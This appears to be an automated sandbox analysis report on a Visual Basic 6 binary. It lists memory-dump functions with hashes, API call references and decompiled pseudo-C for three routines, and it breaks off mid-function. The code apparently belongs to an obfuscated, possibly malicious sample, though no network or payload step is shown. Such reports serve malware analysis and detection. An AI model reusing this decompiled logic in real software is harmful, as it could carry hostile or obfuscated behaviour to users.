Uniqueness Score: -1.00%

Function 0221CAE8, Relevance: 1.5, APIs: 1, Instructions: 9COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 0221CBFF

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: f4d707da2266d0dd4db341b37e3955cadeef758f10d66a59035d5568cc39d4b3
Instruction ID: 8e2262e9c8b68c65cbc6e29d884918b033993973057b52280b80a6e39950e030
Opcode Fuzzy Hash: f4d707da2266d0dd4db341b37e3955cadeef758f10d66a59035d5568cc39d4b3
Instruction Fuzzy Hash: 6BB092249E818999DEB40E905C46BA827968752328F600302643FA51CA85E5528CC203

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0222C1F4, Relevance: .4, Instructions: 375COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 3b542a21f2924bfd26bd1dd03e422a7546fa1456e66fc57f59f79053a0d12d99
Instruction ID: 2dbb7e1dd704522fe4653490b7925f88eb3bd7861cbf2e1d5939f169239e3daa
Opcode Fuzzy Hash: 3b542a21f2924bfd26bd1dd03e422a7546fa1456e66fc57f59f79053a0d12d99
Instruction Fuzzy Hash: B7C1D5F21781D24ECF174A3098AD2F9BF98CBD691574CD9D8C1E10F55AC396A28F83A1

Uniqueness

Uniqueness Score: -1.00%

Function 0222BFB8, Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 703b8b1d46311a0e169998e60cfdba956e48a89e3f923ba5ee072076e7d87993
Instruction ID: 6b0611fca8013f3c6927f1eb82cd2c74142bac88ddd6a66cd2bf7a9c38b12028
Opcode Fuzzy Hash: 703b8b1d46311a0e169998e60cfdba956e48a89e3f923ba5ee072076e7d87993
Instruction Fuzzy Hash: 63C1E6F21781D24ECF164A3098AD2F9BF98CBD691574CD9D9C0E10F55AC396A28FC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 0222C444, Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 3817fbd7cc4a3ce651df1c39df2088cfc64f49deaf79e8a0a7014d4d350a6f3a
Instruction ID: 01a0e5b7a99661734b6bef59fe58a228ac9cceb1276f8e6ec6409dcedafdfe93
Opcode Fuzzy Hash: 3817fbd7cc4a3ce651df1c39df2088cfc64f49deaf79e8a0a7014d4d350a6f3a
Instruction Fuzzy Hash: 26812BB15382D28ECF164E3498993B8BF98CB96511B0CD6D9C4E14F56AC3A7928FC361

Uniqueness

Uniqueness Score: -1.00%

Function 0222C0B8, Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: f8b595528762c73e3fcb1f8aaaec6e73db58c84bd5dc4ca0edd5903323ae0c75
Instruction ID: 5d00330a041e3967e055c638b33f05ecf4ccf8bd4b93ff005b268330a80dfda3
Opcode Fuzzy Hash: f8b595528762c73e3fcb1f8aaaec6e73db58c84bd5dc4ca0edd5903323ae0c75
Instruction Fuzzy Hash: 90910B30938362EEDF24CFA8C4C4729B6919F56314F45C29AD9964F2EEC3B2944AC713

Uniqueness

Uniqueness Score: -1.00%

Function 022197E8, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 996e4af0c5b23b5a4844724b76bfa9abc92cb278be367c029697d685a29bf27c
Instruction ID: 28c44f86b66165f925e7b6da5f0c6123b1bca1c303b70e8a33e2cd780041dcd3
Opcode Fuzzy Hash: 996e4af0c5b23b5a4844724b76bfa9abc92cb278be367c029697d685a29bf27c
Instruction Fuzzy Hash: 59519FF11781C24ECF070A309C6E7F8BB98CB96D15F4C99D8C1E10F959C782A28A83A4

Uniqueness

Uniqueness Score: -1.00%

Function 02219917, Relevance: .2, Instructions: 178COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da58141e9fcaf6b6b9d1ab80f7113daffdfa1a1a4466df2524e70091eee572db
Instruction ID: 4cda5767a5a3d46e2e3628f4799c0e21470e7084f84ed047aaf296edee84be91
Opcode Fuzzy Hash: da58141e9fcaf6b6b9d1ab80f7113daffdfa1a1a4466df2524e70091eee572db
Instruction Fuzzy Hash: FA516FF21781924DCF070A309C6E7F8BB58CB96D15F4C99D8C1E10F959C782639E93A4

Uniqueness

Uniqueness Score: -1.00%

Function 02219212, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 754317de36d5e9973c77fb218710584df158a23cc6ef141892b329f31b01642a
Instruction ID: ad80203c2172bd83b1075b5a4fc37adcb8fc541023b99b2f8eee4222d513a527
Opcode Fuzzy Hash: 754317de36d5e9973c77fb218710584df158a23cc6ef141892b329f31b01642a
Instruction Fuzzy Hash: C5310371620202AFD755AFA8CC65FE973E9FF14320F154228E89DD7288CB60AD85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02219102, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615e08d430577826112ea7ec05ce0886340bae9d39c0f56195034d7429da4d8e
Instruction ID: 4b60e0a4281ce3695e79fdf36705a95e3839e9037e99c0d2fdf04c5a71e9f315
Opcode Fuzzy Hash: 615e08d430577826112ea7ec05ce0886340bae9d39c0f56195034d7429da4d8e
Instruction Fuzzy Hash: 2B310371620202AFD755AF98CC65FE973E9FF14320F154228E899D7288CB60AC85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0222767D, Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e902080f3c7a8d2b24a9a49b553970367a36b6568ebbadab95f4838acd78dd9
Instruction ID: 14df3f68947549d3681a0db622b44553c1c9bf6e7db58c8aa179d99c7c1db74b
Opcode Fuzzy Hash: 1e902080f3c7a8d2b24a9a49b553970367a36b6568ebbadab95f4838acd78dd9
Instruction Fuzzy Hash: EEF0657133D225EFCB28CE98C5D0F65F3A2EB54300F529467E4028722DC376E849CA12

Uniqueness

Uniqueness Score: -1.00%

Function 0221CD2F, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04

Uniqueness

Uniqueness Score: -1.00%

Function 0222440F, Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.415441751.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction ID: bebcbd0f18a999ce64e2d619b59837d29f74db5f3d96bd371bc818b82041d4c7
Opcode Fuzzy Hash: ab2d7faec90206d04624137dcf391b9a6c0b9a6dad95826754e4c5e29fff86cb
Instruction Fuzzy Hash: F9B00179662A80CFCE96CF09C290E40B3B4FB48B50F4258D0E8118BB22C268E900CA10

Uniqueness

Uniqueness Score: -1.00%

Function 00427951, Relevance: 50.9, APIs: 22, Strings: 7, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00427951(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				char _v44;
				void* _v48;
				char _v52;
				signed int _v56;
				void* _v60;
				long long _v68;
				char _v76;
				char _v92;
				void* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v136;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int _t71;
				char* _t77;
				short _t78;
				char* _t80;
				char* _t82;
				signed int _t89;
				char* _t93;
				signed int _t96;
				void* _t113;
				void* _t115;
				intOrPtr _t116;
				void* _t121;

				_t116 = _t115 - 0xc;
				 *[fs:0x0] = _t116;
				L004015F0();
				_v16 = _t116;
				_v12 = 0x4011e0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x7c,  *[fs:0x0], 0x4015f6, _t113);
				_v68 =  *0x4011d8;
				_v76 = 5;
				_t71 =  &_v76;
				_push(_t71);
				L004017EE();
				L0040183C();
				_push(_t71);
				_push(L"Double");
				L004017F4();
				asm("sbb eax, eax");
				_v112 =  ~( ~( ~_t71));
				L0040182A();
				L00401824();
				if(_v112 != 0) {
					_push(0);
					_push(L"Caption");
					_push(0);
					_push(L"Opsione12");
					_push( &_v44);
					_t82 =  &_v76;
					_push(_t82);
					L00401830();
					_push(_t82);
					_push( &_v92);
					L004017E8();
					_t121 = _t116 + 0x20;
					if( *0x435744 != 0) {
						_v140 = 0x435744;
					} else {
						_push(0x435744);
						_push(0x40342c);
						L00401812();
						_v140 = 0x435744;
					}
					_t20 =  &_v140; // 0x435744
					_v112 =  *((intOrPtr*)( *_t20));
					_t89 =  *((intOrPtr*)( *_v112 + 0x4c))(_v112,  &_v60);
					asm("fclex");
					_v116 = _t89;
					if(_v116 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x4c);
						_push(0x40341c);
						_push(_v112);
						_push(_v116);
						L00401800();
						_v144 = _t89;
					}
					_v120 = _v60;
					_t93 =  &_v52;
					L004017E2();
					_t96 =  *((intOrPtr*)( *_v120 + 0x24))(_v120, L"STRIPTEASING", _t93, _t93,  &_v92,  &_v56);
					asm("fclex");
					_v124 = _t96;
					if(_v124 >= 0) {
						_v148 = _v148 & 0x00000000;
					} else {
						_push(0x24);
						_push(0x403494);
						_push(_v120);
						_push(_v124);
						L00401800();
						_v148 = _t96;
					}
					_v136 = _v56;
					_v56 = _v56 & 0x00000000;
					L0040183C();
					L0040182A();
					L004017FA();
					_push( &_v92);
					_push( &_v76);
					_push(2);
					L00401842();
					_t116 = _t121 + 0xc;
				}
				_push(0);
				_push(L"Style");
				_push(0);
				_push(L"Opsione18");
				_push( &_v44);
				_t77 =  &_v76;
				_push(_t77);
				L00401830();
				_push(_t77);
				_t78 =  &_v92;
				_push(_t78);
				L004017E8();
				_push(_t78);
				L004017DC();
				_v28 = _t78;
				_push( &_v92);
				_t80 =  &_v76;
				_push(_t80);
				_push(2);
				L00401842();
				asm("wait");
				_push(0x427ba4);
				L00401824();
				L0040182A();
				return _t80;
			}

0x00427954
0x00427963
0x0042796d
0x00427975
0x00427978
0x0042797f
0x0042798e
0x00427997
0x0042799a
0x004279a1
0x004279a4
0x004279a5
0x004279af
0x004279b4
0x004279b5
0x004279ba
0x004279c1
0x004279c7
0x004279ce
0x004279d6
0x004279e1
0x004279e7
0x004279e9
0x004279ee
0x004279f0
0x004279f8
0x004279f9
0x004279fc
0x004279fd
0x00427a05
0x00427a09
0x00427a0a
0x00427a0f
0x00427a19
0x00427a36
0x00427a1b
0x00427a1b
0x00427a20
0x00427a25
0x00427a2a
0x00427a2a
0x00427a40
0x00427a48
0x00427a57
0x00427a5a
0x00427a5c
0x00427a63
0x00427a7f
0x00427a65
0x00427a65
0x00427a67
0x00427a6c
0x00427a6f
0x00427a72
0x00427a77
0x00427a77
0x00427a89
0x00427a94
0x00427a98
0x00427aab
0x00427aae
0x00427ab0
0x00427ab7
0x00427ad3
0x00427ab9
0x00427ab9
0x00427abb
0x00427ac0
0x00427ac3
0x00427ac6
0x00427acb
0x00427acb
0x00427add
0x00427ae3
0x00427af0
0x00427af8
0x00427b00
0x00427b08
0x00427b0c
0x00427b0d
0x00427b0f
0x00427b14
0x00427b14
0x00427b17
0x00427b19
0x00427b1e
0x00427b20
0x00427b28
0x00427b29
0x00427b2c
0x00427b2d
0x00427b35
0x00427b36
0x00427b39
0x00427b3a
0x00427b42
0x00427b43
0x00427b48
0x00427b4f
0x00427b50
0x00427b53
0x00427b54
0x00427b56
0x00427b5e
0x00427b5f
0x00427b96
0x00427b9e
0x00427ba3

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042796D
#591.MSVBVM60(00000005), ref: 004279A5
__vbaStrMove.MSVBVM60(00000005), ref: 004279AF
__vbaStrCmp.MSVBVM60(Double,00000000,00000005), ref: 004279BA
__vbaFreeStr.MSVBVM60(Double,00000000,00000005), ref: 004279CE
__vbaFreeVar.MSVBVM60(Double,00000000,00000005), ref: 004279D6
__vbaVarLateMemCallLdRf.MSVBVM60(00000005,?,Opsione12,00000000,Caption,00000000,Double,00000000,00000005), ref: 004279FD
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,004015F6), ref: 00427A0A
__vbaNew2.MSVBVM60(0040342C,00435744,?,?,?,?,?,?,?,004015F6), ref: 00427A25
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040341C,0000004C), ref: 00427A72
__vbaStrVarVal.MSVBVM60(?,?,?), ref: 00427A98
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403494,00000024), ref: 00427AC6
__vbaStrMove.MSVBVM60(00000000,?,00403494,00000024), ref: 00427AF0
__vbaFreeStr.MSVBVM60(00000000,?,00403494,00000024), ref: 00427AF8
__vbaFreeObj.MSVBVM60(00000000,?,00403494,00000024), ref: 00427B00
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00427B0F
__vbaVarLateMemCallLdRf.MSVBVM60(00000005,?,Opsione18,00000000,Style,00000000,Double,00000000,00000005), ref: 00427B2D
__vbaVarLateMemCallLd.MSVBVM60(?,00000000,?,?,?,004015F6), ref: 00427B3A
__vbaI2Var.MSVBVM60(00000000,?,?,?,?,?,?,?,004015F6), ref: 00427B43
__vbaFreeVarList.MSVBVM60(00000002,?,?,00000000,?,?,?,?,?,?,?,004015F6), ref: 00427B56
__vbaFreeVar.MSVBVM60(00427BA4,?,?,00000000,?,?,?,?,?,?,?,004015F6), ref: 00427B96
__vbaFreeStr.MSVBVM60(00427BA4,?,?,00000000,?,?,?,?,?,?,?,004015F6), ref: 00427B9E

Strings

Double, xrefs: 004279B5
Style, xrefs: 00427B19
DWC, xrefs: 00427A40
Caption, xrefs: 004279E9
STRIPTEASING, xrefs: 00427A9E
Opsione12, xrefs: 004279F0
Opsione18, xrefs: 00427B20

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$CallLate$CheckHresultListMove$#591ChkstkNew2
String ID: Caption$DWC$Double$Opsione12$Opsione18$STRIPTEASING$Style
API String ID: 262159873-743877665
Opcode ID: 9351af2bbdb13fc62cd03d3ffea7d1d5a8ccf07252e6dae1a1c46da7ac63e54d
Instruction ID: ae92fbb2a76d2c969e761f70a565459ec1c496670cac9ab48837887f023e74d6
Opcode Fuzzy Hash: 9351af2bbdb13fc62cd03d3ffea7d1d5a8ccf07252e6dae1a1c46da7ac63e54d
Instruction Fuzzy Hash: E1510C72D00218ABDB11EFE5DC46FDEBBB8AF04704F50806AF505BB1A2DB785A458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042B7D6, Relevance: 45.7, APIs: 24, Strings: 2, Instructions: 239
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0042B7D6(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v60;
				char _v76;
				char* _v84;
				intOrPtr _v92;
				char _v96;
				void* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				char _v132;
				signed int _v136;
				intOrPtr* _v140;
				signed int _v144;
				intOrPtr* _v148;
				signed int _v152;
				intOrPtr _v156;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				char _v172;
				signed int _v176;
				signed int _t100;
				char* _t104;
				char* _t108;
				signed int _t112;
				char* _t117;
				signed int _t121;
				char* _t125;
				signed int _t129;
				char* _t130;
				char* _t131;
				char* _t132;
				signed int _t135;
				intOrPtr _t156;
				intOrPtr _t163;
				signed int _t177;
				void* _t179;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t163;
				L004015F0();
				_v12 = _t163;
				_v8 = 0x401388;
				_v84 = L"Afars";
				_v92 = 8;
				L00401794();
				_t100 =  &_v60;
				_push(_t100);
				L004017EE();
				L0040183C();
				_push(_t100);
				_push(L"String");
				L004017F4();
				asm("sbb eax, eax");
				_v100 =  ~( ~( ~_t100));
				L0040182A();
				L00401824();
				_t104 = _v100;
				if(_t104 != 0) {
					if( *0x435010 != 0) {
						_v132 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v132 = 0x435010;
					}
					_t108 =  &_v28;
					L0040180C();
					_v100 = _t108;
					_t112 =  *((intOrPtr*)( *_v100 + 0x160))(_v100,  &_v32, _t108,  *((intOrPtr*)( *((intOrPtr*)( *_v132)) + 0x304))( *_v132));
					asm("fclex");
					_v104 = _t112;
					if(_v104 >= 0) {
						_v136 = _v136 & 0x00000000;
					} else {
						_push(0x160);
						_push(0x403568);
						_push(_v100);
						_push(_v104);
						L00401800();
						_v136 = _t112;
					}
					_push(0);
					_push(0);
					_push(_v32);
					_push( &_v60);
					L00401788();
					if( *0x435010 != 0) {
						_v140 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v140 = 0x435010;
					}
					_t117 =  &_v36;
					L0040180C();
					_v108 = _t117;
					_t121 =  *((intOrPtr*)( *_v108 + 0x68))(_v108,  &_v96, _t117,  *((intOrPtr*)( *((intOrPtr*)( *_v140)) + 0x30c))( *_v140));
					asm("fclex");
					_v112 = _t121;
					if(_v112 >= 0) {
						_v144 = _v144 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403568);
						_push(_v108);
						_push(_v112);
						L00401800();
						_v144 = _t121;
					}
					if( *0x435010 != 0) {
						_v148 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v148 = 0x435010;
					}
					_t156 =  *((intOrPtr*)( *_v148));
					_t125 =  &_v40;
					L0040180C();
					_v116 = _t125;
					_t129 =  *((intOrPtr*)( *_v116 + 0xf8))(_v116,  &_v44, _t125,  *((intOrPtr*)(_t156 + 0x2fc))( *_v148));
					asm("fclex");
					_v120 = _t129;
					if(_v120 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0xf8);
						_push(0x403568);
						_push(_v116);
						_push(_v120);
						L00401800();
						_v152 = _t129;
					}
					_t130 =  &_v76;
					L00401788();
					L00401770();
					_t131 =  &_v76;
					L00401782();
					_v156 = _t131;
					asm("fild dword [ebp-0x98]");
					_v160 =  *0x401380;
					_t177 = _v160;
					_v116 = _t177;
					asm("fild dword [ebp-0x5c]");
					_v164 = _t177;
					_v120 = _v164;
					_t179 =  *0x401378;
					_v124 = _t179;
					_t132 =  &_v60;
					L00401782();
					_v168 = _t132;
					asm("fild dword [ebp-0xa4]");
					_v172 = _t179;
					_v132 = _v172;
					_t135 =  *((intOrPtr*)( *_a4 + 0x2c8))(_a4, 6, _t156, _t132, _t156, _t156, _t156, _t131, _t130, _t130, _v44, 0, 0);
					asm("fclex");
					_v124 = _t135;
					if(_v124 >= 0) {
						_v176 = _v176 & 0x00000000;
					} else {
						_push(0x2c8);
						_push(0x4031f4);
						_push(_a4);
						_push(_v124);
						L00401800();
						_v176 = _t135;
					}
					_push( &_v44);
					_push( &_v32);
					_push( &_v40);
					_push( &_v36);
					_push( &_v28);
					_push(5);
					L004017A0();
					_push( &_v76);
					_t104 =  &_v60;
					_push(_t104);
					_push(2);
					L00401842();
				}
				asm("wait");
				_push(0x42bb5b);
				return _t104;
			}

0x0042b7db
0x0042b7e6
0x0042b7e7
0x0042b7f3
0x0042b7fb
0x0042b7fe
0x0042b805
0x0042b80c
0x0042b819
0x0042b81e
0x0042b821
0x0042b822
0x0042b82c
0x0042b831
0x0042b832
0x0042b837
0x0042b83e
0x0042b844
0x0042b84b
0x0042b853
0x0042b858
0x0042b85e
0x0042b86b
0x0042b885
0x0042b86d
0x0042b86d
0x0042b872
0x0042b877
0x0042b87c
0x0042b87c
0x0042b8a0
0x0042b8a4
0x0042b8a9
0x0042b8b8
0x0042b8be
0x0042b8c0
0x0042b8c7
0x0042b8e6
0x0042b8c9
0x0042b8c9
0x0042b8ce
0x0042b8d3
0x0042b8d6
0x0042b8d9
0x0042b8de
0x0042b8de
0x0042b8ed
0x0042b8ef
0x0042b8f1
0x0042b8f7
0x0042b8f8
0x0042b907
0x0042b924
0x0042b909
0x0042b909
0x0042b90e
0x0042b913
0x0042b918
0x0042b918
0x0042b948
0x0042b94c
0x0042b951
0x0042b960
0x0042b963
0x0042b965
0x0042b96c
0x0042b988
0x0042b96e
0x0042b96e
0x0042b970
0x0042b975
0x0042b978
0x0042b97b
0x0042b980
0x0042b980
0x0042b996
0x0042b9b3
0x0042b998
0x0042b998
0x0042b99d
0x0042b9a2
0x0042b9a7
0x0042b9a7
0x0042b9cd
0x0042b9d7
0x0042b9db
0x0042b9e0
0x0042b9ef
0x0042b9f5
0x0042b9f7
0x0042b9fe
0x0042ba1d
0x0042ba00
0x0042ba00
0x0042ba05
0x0042ba0a
0x0042ba0d
0x0042ba10
0x0042ba15
0x0042ba15
0x0042ba2b
0x0042ba2f
0x0042ba3d
0x0042ba43
0x0042ba47
0x0042ba4c
0x0042ba52
0x0042ba58
0x0042ba5e
0x0042ba65
0x0042ba68
0x0042ba6b
0x0042ba78
0x0042ba7b
0x0042ba82
0x0042ba85
0x0042ba89
0x0042ba8e
0x0042ba94
0x0042ba9a
0x0042baa7
0x0042bab4
0x0042baba
0x0042babc
0x0042bac3
0x0042bae2
0x0042bac5
0x0042bac5
0x0042baca
0x0042bacf
0x0042bad2
0x0042bad5
0x0042bada
0x0042bada
0x0042baec
0x0042baf0
0x0042baf4
0x0042baf8
0x0042bafc
0x0042bafd
0x0042baff
0x0042bb0a
0x0042bb0b
0x0042bb0e
0x0042bb0f
0x0042bb11
0x0042bb16
0x0042bb19
0x0042bb1a
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004015F6), ref: 0042B7F3
__vbaVarDup.MSVBVM60 ref: 0042B819
#591.MSVBVM60(?), ref: 0042B822
__vbaStrMove.MSVBVM60(?), ref: 0042B82C
__vbaStrCmp.MSVBVM60(String,00000000,?), ref: 0042B837
__vbaFreeStr.MSVBVM60(String,00000000,?), ref: 0042B84B
__vbaFreeVar.MSVBVM60(String,00000000,?), ref: 0042B853
__vbaNew2.MSVBVM60(00402614,00435010,String,00000000,?), ref: 0042B877
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,String,00000000,?), ref: 0042B8A4
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000160,?,?,?,?,?,?,?,String,00000000,?), ref: 0042B8D9
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?,?,?,String,00000000,?), ref: 0042B8F8
__vbaNew2.MSVBVM60(00402614,00435010), ref: 0042B913
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B94C
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,00000068), ref: 0042B97B
__vbaNew2.MSVBVM60(00402614,00435010), ref: 0042B9A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042B9DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,00403568,000000F8), ref: 0042BA10
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0042BA2F
__vbaFpI4.MSVBVM60 ref: 0042BA3D
__vbaI4Var.MSVBVM60(?,00000000), ref: 0042BA47
__vbaI4Var.MSVBVM60(?,?,?,?,?,00000000), ref: 0042BA89
__vbaHresultCheckObj.MSVBVM60(00000000,?,004031F4,000002C8), ref: 0042BAD5
__vbaFreeObjList.MSVBVM60(00000005,?,?,00000000,?,?), ref: 0042BAFF
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,00000000), ref: 0042BB11

Strings

String, xrefs: 0042B832
Afars, xrefs: 0042B805

Memory Dump Source

Source File: 00000002.00000002.415101416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.415095592.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.415131046.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.415136145.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$New2$CallLateList$#591ChkstkMove
String ID: Afars$String
API String ID: 3796316317-3120527446
Opcode ID: 47017efa9b8bd52eccfda04e07cdf869cacb0099af27f0e79a0fdb94b6555ff1
Instruction ID: c898c9522b69106a62afd120f3a548e66534b4eea8aea8bdfb103ece619d4ac4
Opcode Fuzzy Hash: 47017efa9b8bd52eccfda04e07cdf869cacb0099af27f0e79a0fdb94b6555ff1
Instruction Fuzzy Hash: C7A11775E00218AFDB10EFA1CC45BDEBBB8BF08304F5044AAE145BB1A1DB795A44DF69

Uniqueness

Uniqueness Score: -1.00%

Function 0042BF0C, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E0042BF0C(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				intOrPtr _v28;
				char _v36;
				char _v40;
				signed int _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				char* _v68;
				intOrPtr _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				intOrPtr _v100;
				intOrPtr _v108;
				intOrPtr _v116;
				intOrPtr _v124;
				intOrPtr _v132;
				intOrPtr _v140;
				char _v160;
				char _v164;
				intOrPtr* _v168;
				signed int _v172;
				intOrPtr* _v176;
				signed int _v180;
				intOrPtr* _v184;
				signed int _v188;
				signed int _v196;
				intOrPtr* _v200;
				signed int _v204;
				intOrPtr* _v208;
				signed int _v212;
				char _v216;
				signed int _v220;
				char* _t88;
				char* _t92;
				signed int _t96;
				char* _t100;
				signed int _t104;
				signed int _t117;
				intOrPtr _t151;

				_push(0x4015f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_t88 = 0xc8;
				L004015F0();
				_v12 = _t151;
				_v8 = 0x4013e0;
				L0040178E();
				_push(0x403758);
				_push(0x403738);
				_push(0);
				L00401758();
				if(0xc8 != 1) {
					if( *0x435010 != 0) {
						_v200 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v200 = 0x435010;
					}
					_t92 =  &_v36;
					L0040180C();
					_v168 = _t92;
					_t96 =  *((intOrPtr*)( *_v168 + 0x68))(_v168,  &_v160, _t92,  *((intOrPtr*)( *((intOrPtr*)( *_v200)) + 0x308))( *_v200));
					asm("fclex");
					_v172 = _t96;
					if(_v172 >= 0) {
						_v204 = _v204 & 0x00000000;
					} else {
						_push(0x68);
						_push(0x403568);
						_push(_v168);
						_push(_v172);
						L00401800();
						_v204 = _t96;
					}
					if( *0x435010 != 0) {
						_v208 = 0x435010;
					} else {
						_push(0x435010);
						_push(0x402614);
						L00401812();
						_v208 = 0x435010;
					}
					_t100 =  &_v40;
					L0040180C();
					_v176 = _t100;
					_t104 =  *((intOrPtr*)( *_v176 + 0x118))(_v176,  &_v164, _t100,  *((intOrPtr*)( *((intOrPtr*)( *_v208)) + 0x30c))( *_v208));
